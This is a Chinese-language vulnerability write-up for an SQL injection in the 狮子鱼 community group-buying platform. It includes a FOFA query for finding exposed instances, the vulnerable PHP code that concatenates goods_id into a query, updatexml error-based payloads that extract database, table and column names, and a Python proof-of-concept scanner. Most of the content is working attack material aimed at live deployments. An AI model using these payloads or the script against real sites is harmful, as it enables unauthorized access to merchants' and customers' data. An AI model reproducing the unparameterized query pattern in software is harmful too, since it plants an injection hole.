狮子鱼

以小程序为载体，快速搭建社区社群社交资源的社区团购平台，帮助商家集中运营管理，轻松管理团长/商品/订单/配备货/售后/财务结算等主要销售场景由快递代收点、社区物业、业主等发起的社区微信群每个群都相当于一个社区店。

fofa搜索

body="/seller.php?s=/Public/login"

产生原因

public function goods_detail()
    {
        $goods_id = I('get.goods_id');
        //gallery =>img_url
        //goods goods.goods_desc  goods_name group_price  market_price  sell_count group_number 

        $sql="select g.*,gd.description,gd.summary,gd.tag from ".
        C('DB_PREFIX')."goods g,".C('DB_PREFIX')."goods_description gd where g.goods_id=gd.goods_id and g.goods_id=".$goods_id;

        $goods_arr=M()->query($sql);

        $qian=array("\r\n");
        $hou=array("<br/>");
        $goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']); 

        $sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".$goods_id;
        $goods_image=M()->query($sql);

        $gallery = array();
        $default_image = '';
        foreach($goods_image as $val)
        {
            $val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/image/'.$val['image'];

            if(empty($default_image))
            {
                $default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));
            }

            $gallery[] = array('img_url' => $val['img_url']); 
        }

        $goods = $goods_arr[0];

路径及参数位置

路径： /index.php?s=api/goods_detail&goods_id=1

漏洞复现

库名：1 and updatexml(0,concat(0x7e,(database())),0)

表名：1 and updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0)

字段名：1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1),0x7e),1)

POC

# -*- coding:utf-8 -*-
import requests
import re
import json
import sys
import urllib3

urllib3.disable_warnings() #忽略https证书告警

vunl_path = "/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)"

def POC(url):
    target_url = url + vunl_path
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",

    }
    try:
        response = requests.get(url=target_url, headers=headers, verify=False, timeout=10)
        print("正在测试：", target_url)
        if "syntax" in response.text:
            print("上述地址存在SQL注入")

    except Exception as e:
        print("请求失败！")
        sys.exit(0)

if __name__ == '__main__':
    print("python3 poc.py http://xx.xx.xx.xx")
    addr = str(input("Please input url"))
    POC(addr)